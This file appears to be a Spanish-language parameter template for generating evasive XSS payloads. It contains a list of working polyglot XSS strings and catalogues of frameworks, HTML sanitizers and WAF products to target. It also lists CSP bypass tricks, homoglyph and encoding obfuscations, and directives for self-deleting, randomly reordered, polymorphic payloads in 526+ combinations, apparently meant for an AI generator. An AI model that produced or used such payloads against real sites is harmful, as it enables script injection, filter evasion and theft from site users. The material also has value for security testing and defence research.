	  #103: HTML condicional IE (<!--[if gte IE 4]> ...) — [LEGACY]
	  #104: US-ASCII malformado (7-bit) para <script> — [LEGACY]
	  #105: Islas de datos XML + SPAN DATASRC — [LEGACY]
	  #106: HTML+TIME (t:set / #default#time2) — [LEGACY]
	  #107: BASE HREF="javascript:..." con comentario — [LEGACY]
	  #108: SSI <!--#exec ... --> para inyectar — [LEGACY]
	  #109: PHP echo concatenado para emitir <script> — [LEGACY]
	  #110: object/data="javascript:..." / applet code=javascript:... — [LEGACY]
          #: Cada payload cambia el orden de sus piezas internas (etiqueta, evento, atributos) dinámicamente Inyecta instrucciones autodestructivas (que se eliminan tras ejecutar) Usa reensamblado fragmentado (split + join, concat, null bytes, comentarios aleatorios) Añade reordenamiento aleatorio en cada generación, así que ni siquiera dos ejecuciones iguales generan el mismo payload	
          #*: repetir última técnica usada
          #**: aplicar solo en caracteres normales (no especiales)
          #a: varias entre tecnicas generar entropia entre cada tecnias usada en cada paylodad xss
          #0:
          #00:
          #526+:




x10_polimorficos_xss:
	#1: ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext></|><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
	#2: '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext></|><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
	#3: -->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
	#4: <svg%0Ao%00nload=%09((pro\u006dpt))()//
	#5: /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>/alert()/
	#6: /</title/'/</style/</script/--><p" onclick=alert()//>/alert()/
	#7: " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
	#8: “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
	#9: jaVasCript:/-//*\/'/"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
	#10: javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>/alert()/
	#11: javascript://--></script></title></style>"/</textarea>/<alert()/' onclick=alert()//>a
	#12: javascript://</title>"/</script></style></textarea/-->/<alert()/' onclick=alert()//>/
	#13: javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>/alert()/
	#14: javascript://'//" --></textarea></style></script></title><b onclick= alert()//>/alert()/
	#15: javascript://</title></textarea></style></script --><li '//" '/alert()/', onclick=alert()//
	#16: javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>/alert()/
	#17: --></script></title></style>"/</textarea><a' onclick=alert()//>/alert()/
	#18: javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
	#19: javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>/alert()/
	#20: javascript://--></script></title></style>"/</textarea>/<alert()/' onclick=alert()//>a
	#21: javascript://</title>"/</script></style></textarea/-->/<alert()/' onclick=alert()//>/
	#22: javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>/alert()/
	#23: javascript://'//" --></textarea></style></script></title><b onclick= alert()//>/alert()/
	#24: javascript://</title></textarea></style></script --><li '//" '/alert()/', onclick=alert()//
	#25: javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>/alert()/
	#26: javascript:"/'/`/--></noscript></title></textarea></style></template></noembed></script><html " onmouseover=/<svg/*/onload=alert()//
	#27: javascript:"/'/`/" /</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/<html//onmouseover=alert()//
	#28: javascript:"/"/`/' /</template></textarea></noembed></noscript></title></style></script>--><svg onload=/<html//onmouseover=alert()//
	#29: javascript://"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>
	#30: JavaScript://%250Aalert?.(1)//'/'/"/"//*\/%26apos;)/<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/${//;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
	#31: ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
	#32: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	#33: javascript:"/'/`/--></noscript></title></textarea></style></template></noembed></script><html " onmouseover=/<svg/*/onload=alert()//
	#34: javascript:"/'/`/" /</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/<html//onmouseover=alert()//
	#35: javascript:"/"/`/' /</template></textarea></noembed></noscript></title></style></script>--><svg onload=/<html//onmouseover=alert()//
	#36: javascript://"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>
	#37: JavaScript://%250Aalert?.(1)//'/'/"/"//*\/%26apos;)/<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/${//;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
        #*:
        #**:
        #a:
        #0:
        #00:
        #526+:



x11_frameworks:
    #1:  React
    #2:  Angular
    #3:  Vue
    #4:  Django
    #5:  Ruby on Rails
    #6:  Laravel
    #7:  Symfony
    #8:  Flask
    #9:  Express.js
    #10: Spring Boot
    #11: ASP.NET Core
    #12: Next.js
    #13: Nuxt.js
    #14: Svelte
    #15: SvelteKit
    #16: Remix
    #17: Astro
    #18: SolidJS
    #19: Alpine.js
    #20: Ember.js
    #21: Backbone.js
    #22: Mithril.js
    #23: Riot.js
    #24: Marko.js
    #25: Knockout.js
    #26: Preact
    #27: Qwik
    #28: Blitz.js
    #29: RedwoodJS
    #30: Meteor
    #31: AdonisJS
    #32: NestJS
    #33: Hapi.js
    #34: Koa.js
    #35: Fastify
    #36: Socket.io (como framework de realtime)
    #37: Django REST Framework
    #38: Flask-RESTful
    #39: Falcon
    #40: Pyramid
    #41: CherryPy
    #42: Tornado
    #43: Sanic
    #44: Quart
    #45: Rocket (Rust)
    #46: Actix-Web (Rust)
    #47: Axum (Rust)
    #48: Warp (Rust)
    #49: Gin (Go)
    #50: Echo (Go)
    #51:  Fiber (Go)
    #52:  Beego (Go)
    #53:  Buffalo (Go)
    #54:  Revel (Go)
    #55:  Micronaut (Java)
    #56:  Quarkus (Java)
    #57:  Dropwizard (Java)
    #58:  Play Framework (Java/Scala)
    #59:  Vaadin (Java)
    #60:  Struts2 (Java)
    #61:  JSF (Jakarta Faces)
    #62:  Grails (Groovy/Java)
    #63:  Jakarta EE (JavaEE)
    #64:  JHipster (Java/Angular)
    #65:  Blade (Java)
    #66:  Ninja Framework (Java)
    #67:  Ratpack (Java)
    #68:  Spark Java
    #69:  Wicket (Java)
    #70:  GWT (Google Web Toolkit)
    #71:  ASP.NET MVC (C#)
    #72:  Blazor (C#)
    #73:  ServiceStack (C#)
    #74:  NancyFX (C#)
    #75:  ABP Framework (C#)
    #76:  OrchardCore (C#)
    #77:  DotVVM (C#)
    #78:  Umbraco (C#)
    #79:  ColdBox (CFML)
    #80:  Lucee (CFML)
    #81:  CodeIgniter (PHP)
    #82:  CakePHP (PHP)
    #83:  Zend Framework / Laminas (PHP)
    #84:  Phalcon (PHP)
    #85:  FuelPHP (PHP)
    #86:  Yii2 (PHP)
    #87:  Slim (PHP)
    #88:  Kohana (PHP)
    #89:  Prado (PHP)
    #90:  Seagull (PHP)
    #91:  Mojolicious (Perl)
    #92:  Catalyst (Perl)
    #93:  Dancer2 (Perl)
    #94:  Phoenix (Elixir)
    #95:  Plug (Elixir)
    #96:  Lift (Scala)
    #97:  Scalatra (Scala)
    #98:  Yesod (Haskell)
    #99:  Spock (Haskell)
    #100: TreeFrog (C++)
    #*:
    #**:
    #a:   generar variantes adaptadas a varios frameworks
    #0:
    #00:
    #526+:




x12_parsers_sanitizadores:
    #1:  DOMPurify
    #2:  OWASP Java HTML Sanitizer
    #3:  Google Caja
    #4:  Angular Sanitizer
    #5:  Bleach (Python)
    #6:  Jsoup (Java)
    #7:  HtmlAgilityPack (C#)
    #8:  HtmlSanitizer (C# Ganss.XSS)
    #9:  PHP HTML Purifier
    #10: Django bleach cleaner
    #11: Rails sanitize helper
    #12: Ruby Loofah
    #13: Nokogiri (Ruby)
    #14: Sanitize.js (Node)
    #15: xss-clean (Express middleware)
    #16: express-sanitizer
    #17: secure-html (Node)
    #18: sanitizer (npm)
    #19: Vue DOM sanitizer
    #20: React DOM escape/JSX sanitizer
    #21: Svelte HTML escaping parser
    #22: Ember HTMLBars sanitizer
    #23: ASP.NET RequestValidation
    #24: Microsoft AntiXSS Library
    #25: MS Security Runtime Encoder
    #26: Content Security Policy inline sanitizer (browser built-in)
    #27: Chrome DOM Parser (innerHTML)
    #28: Firefox HTML Parser (innerHTML)
    #29: WebKit HTML Parser (Safari)
    #30: Edge Chromium DOM Parser
    #31: Marko.js HTML escape
    #32: Mithril sanitize module
    #33: Riot.js sanitizer
    #34: Knockout.js bindings sanitizer
    #35: Backbone.js HTML escape
    #36: Handlebars escapeHTML
    #37: Mustache.js escape
    #38: Pug (Jade) HTML escape
    #39: EJS HTML escape
    #40: Liquid (Shopify) HTML sanitizer
    #41: Twig (PHP) escape filter
    #42: Jinja2 (Python) escape filter
    #43: Mako (Python) escape
    #44: Freemarker (Java) escape
    #45: Thymeleaf (Java) HTML sanitizer
    #46: Velocity (Java) escape
    #47: ColdFusion ESAPI encoder
    #48: Go bluemonday sanitizer
    #49: Hugo Goldmark HTML sanitizer
    #50: Rust ammonia sanitizer
    #51:  Drupal Xss::filter
    #52:  WordPress wp_kses
    #53:  Joomla JFilterInput
    #54:  MediaWiki Sanitizer
    #55:  Typo3 HtmlSanitizer
    #56:  Magento HTML filter
    #57:  Prestashop HTML Purifier
    #58:  Moodle clean_text()
    #59:  phpBB message parser
    #60:  Discourse PrettyText sanitizer
    #61:  Ghost Handlebars sanitizer
    #62:  GitHub HTML Pipeline
    #63:  GitLab Banzai pipeline sanitizer
    #64:  Bitbucket markdown sanitizer
    #65:  Confluence XHTML sanitizer
    #66:  Atlassian CommonMark sanitizer
    #67:  Redmine sanitizer
    #68:  Trac wiki parser
    #69:  Bugzilla HTML scrubber
    #70:  Roundcube rcube_utils::rep_specialchars_output
    #71:  Zimbra HTML sanitizer
    #72:  Horde Text_Filter
    #73:  SquirrelMail sanitize_html()
    #74:  Lotus Domino HTML parser
    #75:  IBM XSS Filter for WebSphere
    #76:  Apache Wicket HTML sanitizer
    #77:  Apache Tapestry HTML sanitizer
    #78:  Apache Sling XSSAPI
    #79:  Adobe AEM HTML sanitizer
    #80:  Oracle WebCenter filter
    #81:  Oracle APEX HTMLEscape
    #82:  SAP UI5 HTML sanitizer
    #83:  Salesforce lightning-escape-html
    #84:  ServiceNow GlideSanitizer
    #85:  Elastic Kibana DOM sanitizer
    #86:  Grafana DOMPurify wrapper
    #87:  Splunk Web XSS filter
    #88:  Jenkins markup formatter
    #89:  SonarQube HTML escaper
    #90:  TeamCity HTML sanitizer
    #91:  VSCode markdown-it sanitizer
    #92:  Eclipse Mylyn wiki parser
    #93:  NetBeans HTML cleaner
    #94:  Qt QTextDocument HTML parser
    #95:  GTK WebKit DOM parser
    #96:  Electron DOM sanitizer
    #97:  Node-Red dashboard sanitizer
    #98:  OpenResty lua-sandbox HTML escape
    #99:  Nginx njs HTML escape
    #100: Perl HTML::Scrubber
    #*:
    #**:
    #a:   generar variantes que evadan múltiples parsers
    #0:
    #00:
    #526+:


x13_waf:
    #1:  ModSecurity (OWASP CRS)
    #2:  Cloudflare WAF
    #3:  Akamai Kona Site Defender
    #4:  Imperva SecureSphere WAF
    #5:  F5 BIG-IP ASM (Advanced WAF)
    #6:  AWS WAF
    #7:  Azure Web Application Firewall
    #8:  Google Cloud Armor
    #9:  Barracuda Web Application Firewall
    #10: Fortinet FortiWeb
    #11: Citrix NetScaler AppFirewall
    #12: Sophos XG Firewall (WAF module)
    #13: Check Point Web Application Protection
    #14: Radware AppWall
    #15: Palo Alto Cloud NGFW WAF
    #16: Trend Micro Cloud One WAF
    #17: AppTrana WAF
    #18: StackPath WAF
    #19: Fastly Next-Gen WAF (Signal Sciences)
    #20: Reblaze WAF
    #21: SiteLock TrueShield
    #22: Sucuri Website Firewall
    #23: Wordfence (WordPress)
    #24: NinjaFirewall (PHP WAF)
    #25: Shadow Daemon (PHP WAF)
    #26: BitNinja WAF
    #27: Imunify360 WAF
    #28: cPGuard WAF
    #29: Atomicorp WAF (Ruleset)
    #30: Trustwave ModSecurity Rules
    #31: Qualys WAS WAF
    #32: Snapt Nova WAF
    #33: Armor Anywhere WAF
    #34: A10 Thunder CFW WAF
    #35: BIG-IP Advanced WAF (F5)
    #36: NSFOCUS WebSafe WAF
    #37: Huawei Cloud WAF
    #38: Tencent Cloud WAF
    #39: Alibaba Cloud WAF
    #40: Baidu Cloud WAF
    #41: JD Cloud WAF
    #42: Yundun WAF
    #43: Qihoo 360 WAF
    #44: Topsec WAF
    #45: WAPPLES (Penta Security)
    #46: DenyAll rWeb (Wallix)
    #47: DBAPPSecurity WAF
    #48: Sangfor WAF
    #49: Hillstone WAF
    #50: Venustech WAF
    #51:  LiteSpeed WebADC WAF
    #52:  OpenLiteSpeed AppFirewall
    #53:  NAXSI (Nginx Anti XSS & SQLi)
    #54:  IronBee WAF
    #55:  SafeLine WAF (Qihoo 360)
    #56:  DotDefender WAF
    #57:  Blue Coat ProxySG WAF
    #58:  Cisco ACE WAF
    #59:  Cisco ASA CX WAF module
    #60:  Juniper WebApp Secure (Pulse Secure)
    #61:  WatchGuard Firebox WAF
    #62:  SonicWall WAF
    #63:  McAfee Web Gateway WAF
    #64:  Symantec ProxySG WAF
    #65:  Trustwave WAF Gateway
    #66:  Positive Technologies PT AF
    #67:  Indusface Total Application Security WAF
    #68:  ArmorLogic Profense WAF
    #69:  SecureSphere Cloud WAF (Imperva legacy)
    #70:  BIG-IP ASM legacy
    #71:  Cisco Cloud WAF (legacy)
    #72:  Barracuda Cloud WAF Service
    #73:  Alert Logic Managed WAF
    #74:  eSentire Managed WAF
    #75:  TrueShield CloudProxy (Sucuri legacy)
    #76:  AppSec Flow WAF
    #77:  Reblaze Hybrid WAF
    #78:  Radware Cloud WAF
    #79:  NSFOCUS ADS WAF
    #80:  Hillstone CloudEdge WAF
    #81:  Tencent Cloud T-Sec WAF
    #82:  Huawei Cloud Enterprise WAF
    #83:  Baidu AI WAF
    #84:  JD Cloud Advanced WAF
    #85:  Yundun AI WAF
    #86:  Topsec Cloud WAF
    #87:  Qihoo 360 Enterprise WAF
    #88:  DBAPPSecurity SaaS WAF
    #89:  Sangfor NGAF WAF
    #90:  Venustech Cloud WAF
    #91:  Secomba Cloud WAF
    #92:  Stackhawk Web Gateway
    #93:  TCell Runtime Application Self-Protection
    #94:  Signal Sciences legacy agent (Fastly)
    #95:  Akamai EdgeWAF (Kona lite)
    #96:  Cloudbric WAF
    #97:  SiteGuard Lite WAF
    #98:  Bitdefender GravityZone WAF
    #99:  Trend Micro Deep Security WAF
    #100: ESET Web Control WAF
    #*:
    #**:
    #a: combinar evasiones para múltiples WAF
    #0:
    #00:
    #526+:




x14_backend_framework_orm:
    #1:  Django + ORM nativo (Python)
    #2:  Flask + SQLAlchemy (Python)
    #3:  FastAPI + SQLAlchemy (Python)
    #4:  Tornado + Peewee (Python)
    #5:  Pyramid + SQLAlchemy (Python)
    #6:  Bottle + PonyORM (Python)
    #7:  CherryPy + SQLObject (Python)
    #8:  Falcon + SQLAlchemy (Python)
    #9:  Sanic + GINO (Python)
    #10: Quart + SQLAlchemy (Python)
    #11: Ruby on Rails + ActiveRecord
    #12: Sinatra + Sequel (Ruby)
    #13: Hanami + ROM.rb (Ruby)
    #14: Padrino + ActiveRecord (Ruby)
    #15: Grape + Sequel (Ruby)
    #16: Laravel + Eloquent (PHP)
    #17: Symfony + Doctrine (PHP)
    #18: CodeIgniter + Query Builder (PHP)
    #19: CakePHP + ORM nativo (PHP)
    #20: Zend Framework + Doctrine (PHP)
    #21: Yii2 + ActiveRecord (PHP)
    #22: FuelPHP + ORM nativo (PHP)
    #23: Phalcon + ORM nativo (PHP)
    #24: Laminas + Doctrine (PHP)
    #25: Slim + Eloquent (PHP)
    #26: Spring Boot + Hibernate (Java)
    #27: Jakarta EE + EclipseLink (Java)
    #28: Struts2 + Hibernate (Java)
    #29: JSF + JPA (Java)
    #30: Vaadin + JPA (Java)
    #31: Play Framework + Ebean (Java)
    #32: Micronaut + Hibernate (Java)
    #33: Dropwizard + JDBI (Java)
    #34: Spark Java + Hibernate (Java)
    #35: Grails + GORM (Groovy/Java)
    #36: ASP.NET MVC + Entity Framework (C#)
    #37: ASP.NET Core + EF Core (C#)
    #38: Blazor Server + EF Core (C#)
    #39: NancyFX + Dapper (C#)
    #40: ServiceStack + OrmLite (C#)
    #41: Mono ASP.NET + NHibernate (C#)
    #42: ABP Framework + EF Core (C#)
    #43: OrchardCore + YesSql (C#)
    #44: DotVVM + EF Core (C#)
    #45: Umbraco + NPoco (C#)
    #46: Express.js + Sequelize (Node.js)
    #47: Koa.js + Objection.js (Node.js)
    #48: NestJS + TypeORM (Node.js)
    #49: Hapi.js + Knex.js (Node.js)
    #50: Sails.js + Waterline (Node.js)
    #51:  AdonisJS + Lucid ORM (Node.js)
    #52:  Meteor + Mongo Minimongo (Node.js)
    #53:  FeathersJS + Sequelize (Node.js)
    #54:  RedwoodJS + Prisma (Node.js)
    #55:  Blitz.js + Prisma (Node.js)
    #56:  Revel + GORM (Go)
    #57:  Beego + ORM nativo (Go)
    #58:  Buffalo + Pop ORM (Go)
    #59:  Gin + GORM (Go)
    #60:  Echo + GORM (Go)
    #61:  Fiber + GORM (Go)
    #62:  Chi + Ent (Go)
    #63:  Goa + GORM (Go)
    #64:  Iris + GORM (Go)
    #65:  Macaron + xorm (Go)
    #66:  Rocket + Diesel (Rust)
    #67:  Actix-Web + Diesel (Rust)
    #68:  Axum + SQLx (Rust)
    #69:  Warp + SQLx (Rust)
    #70:  Tide + SeaORM (Rust)
    #71:  Phoenix + Ecto (Elixir)
    #72:  Plug + Ecto (Elixir)
    #73:  Nerves + Ecto (Elixir)
    #74:  Play Framework + Slick (Scala)
    #75:  Lift + Mapper (Scala)
    #76:  Scalatra + Slick (Scala)
    #77:  Akka HTTP + Slick (Scala)
    #78:  Finatra + Slick (Scala)
    #79:  QtCppServer + soci (C++)
    #80:  Drogon + ORM nativo (C++)
    #81:  CppCMS + soci (C++)
    #82:  Wt (WebToolkit) + dbo (C++)
    #83:  TreeFrog + ORM nativo (C++)
    #84:  Mojolicious + DBIx::Class (Perl)
    #85:  Catalyst + DBIx::Class (Perl)
    #86:  Dancer2 + DBIx::Class (Perl)
    #87:  ColdFusion + Hibernate (Java base)
    #88:  Lucee CFML + Hibernate (Java base)
    #89:  Haskell Yesod + Persistent (Haskell)
    #90:  Servant + Opaleye (Haskell)
    #91:  Spock + Beam (Haskell)
    #92:  Racket Web Server + Racket DB (Scheme)
    #93:  Common Lisp Hunchentoot + CLSQL
    #94:  Clojure Luminus + next.jdbc
    #95:  Clojure Pedestal + next.jdbc
    #96:  COBOL GnuCOBOL + ODBC bridge
    #97:  RPG/ILE WebFacing + DB2 (IBM i)
    #98:  ABAP SAP WebAS + OpenSQL
    #99:  OpenEdge Progress ABL + ProDataSet
    #100: Delphi RAD Server + FireDAC ORM
    #*:
    #**:
    #a:
    #0:
    #00:
    #526+:



x15_servidor:
    #1:  Apache HTTP Server
    #2:  Nginx
    #3:  Microsoft IIS
    #4:  LiteSpeed Web Server
    #5:  OpenLiteSpeed
    #6:  Caddy
    #7:  Tomcat
    #8:  Jetty
    #9:  Undertow
    #10: WildFly
    #11: JBoss EAP
    #12: GlassFish
    #13: Payara Server
    #14: WebLogic
    #15: WebSphere
    #16: Resin
    #17: Oracle HTTP Server
    #18: IBM HTTP Server
    #19: Sun ONE Web Server
    #20: Netscape Enterprise Server
    #21: Zeus Web Server
    #22: Roxen WebServer
    #23: Boa Web Server
    #24: thttpd
    #25: lighttpd
    #26: Cherokee
    #27: Abyss Web Server
    #28: Hiawatha
    #29: Monkey HTTP Server
    #30: Yaws (Erlang)
    #31: Cowboy (Erlang)
    #32: MochiWeb (Erlang)
    #33: Node.js HTTP Server (core)
    #34: Express.js built-in
    #35: Koa.js built-in
    #36: Fastify built-in
    #37: NestJS HTTP adapter
    #38: Sails.js HTTP hook
    #39: AdonisJS HTTP kernel
    #40: Meteor built-in web server
    #41: Deno Deploy HTTP server
    #42: Bun HTTP server
    #43: Go net/http
    #44: Go Fiber server
    #45: Go Gin server
    #46: Rust Hyper server
    #47: Actix-Web server
    #48: Warp (Rust)
    #49: Rocket (Rust)
    #50: Axum (Rust)
    #51:  Python WSGI SimpleHTTPServer
    #52:  Python http.server (builtin)
    #53:  Django runserver
    #54:  Flask built-in server
    #55:  Tornado HTTPServer
    #56:  Sanic server
    #57:  Uvicorn (ASGI)
    #58:  Daphne (ASGI)
    #59:  Hypercorn (ASGI)
    #60:  Gunicorn (WSGI)
    #61:  Waitress (WSGI)
    #62:  mod_wsgi (Apache module)
    #63:  PHP Built-in Server (cli -S)
    #64:  PHP-FPM + Nginx
    #65:  HHVM HTTP Server
    #66:  HackLang HTTP Server
    #67:  Ruby WEBrick
    #68:  Ruby Puma
    #69:  Ruby Thin
    #70:  Ruby Unicorn
    #71:  Ruby Passenger (Phusion)
    #72:  JRuby Trinidad server
    #73:  Perl Plack (PSGI)
    #74:  Perl Starman
    #75:  Perl HTTP::Daemon
    #76:  CppCMS HTTP server
    #77:  Drogon C++ server
    #78:  Wt (WebToolkit) C++ server
    #79:  Civetweb (C/C++)
    #80:  Mongoose (C)
    #81:  Boa embedded (C)
    #82:  Tux web server (Linux kernel space)
    #83:  Xitami (legacy)
    #84:  Abyss X1 (legacy)
    #85:  Haskell Warp server
    #86:  Haskell Snap server
    #87:  Haskell Yesod built-in
    #88:  Elixir Cowboy (Phoenix)
    #89:  Elixir Bandit server
    #90:  Common Lisp Hunchentoot
    #91:  Racket Web Server
    #92:  Scheme Spiffy
    #93:  COBOL GnuCOBOL CGI server
    #94:  RPG/ILE IBM HTTP Server (IBM i)
    #95:  OpenVMS WASD HTTP Server
    #96:  VxWorks embedded HTTP server
    #97:  QNX Neutrino HTTP server
    #98:  AWS Lambda Function URL server
    #99:  Google Cloud Functions HTTP handler
    #100: Cloudflare Workers HTTP runtime
    #*:
    #**:
    #a:
    #0:
    #00:
    #526+:





x16_csp_bypass:
    #1: inline_event (usar onerror/onload en lugar de <script>)
    #2: trusted_types_bypass (definir TrustedType vacía)
    #3: base_tag_injection (<base href=> malicioso)
    #4: script_nonce_reuse (reusar nonces visibles en HTML)
    #5: data_uri_script (usar src="data:text/javascript,...")
    #*: repetir último bypass
    #**:
    #a:
    #0:
    #00:
    #526+:

 
 
x17_ofuscaciones_idiomas:
	#1: ASCII (100% seguro en todo)
	#2: Latin-1 Supplement (U+0080–U+00FF) — letras/acentos
	#3: Latin Extended-A (U+0100–U+017F)
	#4: Latin Extended-B (U+0180–U+024F)
	#5: Latin Extended Additional (U+1E00–U+1EFF)
	#6: Greek (U+0370–U+03FF) — subset homoglifos (Α,Β,Ε,Ζ,Η,Ι,Κ,Μ,Ν,Ο,Ρ,Τ,Χ)
	#7: Greek Extended (U+1F00–U+1FFF) — usar poco, compat amplia
	#8: Cyrillic (U+0400–U+04FF) — subset homoglifos (А,В,Е,К,М,Н,О,Р,С,Т,Х,І,Ј)
	#9: Cyrillic Supplement (U+0500–U+052F) — homoglifos extra (limitado)
	#10: Fullwidth Forms LATIN (U+FF01–U+FF5E) — válido en strings/identificadores; evitar operadores
	#11: Mathematical Alphanumeric Symbols — Latin (U+1D400–U+1D7FF) en strings/identificadores
	#12: Mathematical Alphanumeric Symbols — Greek (U+1D6A8–U+1D7FF) en strings/identificadores
	#13: Phonetic Extensions (U+1D00–U+1D7F) — solo strings/ids, buen relleno
	#14: Phonetic Extensions Supplement (U+1D80–U+1DBF) — solo strings/ids
	#15: Combining Diacritical Marks (U+0300–U+036F) — solo dentro de strings (Zalgo light)
	#16: Latin Extended-C/D/E (U+2C60–U+2C7F / U+A720–U+A7FF / U+AB30–U+AB6F) — cobertura extra latina
	#17: Modifier Letters (U+02B0–U+02FF) — strings/ids, ojo legibilidad
	#18: Greek & Coptic confusables adicionales (U+03D0–U+03FF subset) — strings/ids
	#19: Cyrillic Extended-A/B (U+2DE0–U+2DFF / U+A640–U+A69F) — homoglifos raros strings/ids
	#20: Letterlike Symbols (U+2100–U+214F) — strings/ids, algunos útiles tipo ℮, ℓ

 	(solo en strings/identificadores, no en sintaxis/operadores):

	#21: Superscripts & Subscripts (U+2070–U+209F) — strings/ids
	#22: Combining Diacritical Marks Extended (U+1AB0–U+1AFF) — strings/ids (Zalgo light)
	#23: Enclosed Alphanumerics (U+2460–U+24FF) — strings/ids (ojo legibilidad)
	#24: Latin Extended Additional (U+1E00–U+1EFF) — ya lo incluí como #5; si lo separás, mantené una sola vez
	#25: Spacing Modifier Letters (U+02B0–U+02FF) — strings/ids
	#26: Greek & Coptic extra confusables (U+03D0–U+03FF subset) — strings/ids
	#27: Cyrillic Extended-A/B (U+2DE0–U+2DFF / U+A640–U+A69F) — strings/ids
	#28: Mathematical Operators letters-as-symbols útiles (U+2200–U+22FF subset) — strings/ids
	exotico
	#29: Runic
	#30: Shavian
	#31: Georgian/Armenian
	#32: Cuerniforme
	#33: Fulwidch
	#34: Mathematical
	#35: Zalgo linght
	solo en string ids comentarios indedificaior propios forbid keywprds etc 
	
	
	
	


⚠️ (Parciales, no confiables): #20, #21–#22, #23, #24–#26, #33, #39
💀 (No ejecutan): todos los demás (#27–#129, incluidos Cuneiforme, Lineal A/B, Runic, Ogam, Elbasan, etc.)
    #*: usar la última ofuscación empleada
    #**: aplicar la ofuscación elegida a cada carácter del payload uno por uno (excepto los caracteres especiales y mantener la estructura de js etc )
    #a: combinar entre sí todos los parámetros elegidos y aplicar entropia en cada paylodad(#20,#50,#70)
    #0: no aplicar nada de esta categoría
    #00: IA libre (si no hay parámetros definidos)
    #526+: forzar generación de mínimo 526 combinaciones


x18_codificaciones:
    #1:  base64
    #2:  hexadecimal (\x41\x6c\x65...)
    #3:  HTML entities (&lt; &gt; &quot;)
    #4:  URL encoding (%3Cscript%3E)
    #5:  JS unicode escape (\u003C\u0073\u0063)
    #6:  Octal (\101\154\145)
    #7:  Decimal HTML entities (&#60;&#62;)
    #8:  Hex HTML entities (&#x3C;&#x3E;)
    #9:  Mixed entities (&#x3C;&#60;)
    #10: Punycode (xn-- form)
    #11: MIME quoted-printable
    #12: CSS escapes (\00003C\000073)
    #13: UTF-16 escape (\u003C)
    #14: UTF-32 escape (\U0000003C)
    #15: JS hex escapes (\x3c\x73\x63)
    #16: JS octal escapes (\074\163\143)
    #17: JS decimal escapes (\060\071)
    #18: URL double-encode (%253Cscript%253E)
    #19: URL mixed upper/lower (%3c%53%43)
    #20: URL overlong (%c0%bc)
    #21: URL UTF-16 surrogate (%u003C)
    #22: URL UTF-7 style (+ADw-script+AD4-)
    #23: UTF-7 direct (+ADw+)
    #24: HTML numeric references (&#00060;)
    #25: NCR mixed upper/lower (&#X3c;)
    #26: JS hex-in-string ("\\x3c\\x73")
    #27: JS unicode-in-string ("\\u003c")
    #28: Mixed escape & entity (\x3c&#115;)
    #29: Mixed escape & unicode (\x3c\u0073)
    #30: Base32
    #31: Base36
    #32: Base58
    #33: Base62
    #34: Base85 (Ascii85)
    #35: Base91
    #36: Base100 (emoji encoding)
    #37: ZWSP-delimited binary
    #38: Braille unicode encoding
    #39: Morse code encoding (.--.)
    #40: Binary (01001000)
    #41: Binary HTML entities (&#b01001000;)
    #42: ROT13
    #43: ROT47
    #44: Caesar cipher
    #45: Atbash cipher
    #46: UUencode
    #47: yEnc
    #48: BinHex
    #49: Quoted printable hex
    #50: XML entities (&lt;script&gt;)
    #51:  Nested base64 (base64 dentro de base64)
    #52:  Nested URL encoding (triple %25253C)
    #53:  HTML entity in URL (%26lt%3B)
    #54:  URL in HTML entity (&#x25;3C)
    #55:  Mixed base64 + URL
    #56:  Mixed base64 + HTML entities
    #57:  JS eval string escaped
    #58:  JS bracket access ["\x61\x6c\x65"]
    #59:  JS constructor escape (Function("al"+"ert"))
    #60:  Template literal escapes (\x61${'\x6c\x65'})
    #61:  Backtick unicode (\u0060)
    #62:  Overlong UTF-8 (%c0%af etc.)
    #63:  CESU-8 encoded JS
    #64:  WTF-8 surrogate pairs
    #65:  UTF-16-BE inline BOM
    #66:  UTF-16-LE inline BOM
    #67:  UTF-32-BE inline BOM
    #68:  UTF-32-LE inline BOM
    #69:  Java-style unicode (\u0061)
    #70:  C-style trigraphs (??=)
    #71:  HTML comment wrapping (<!--<script>-->)
    #72:  CDATA wrapping (<![CDATA[<script>]]>)
    #73:  XML-style encoded <![CDATA[]]>
    #74:  SGML shortrefs
    #75:  EBCDIC to ASCII remap encoding
    #76:  BCD encoding
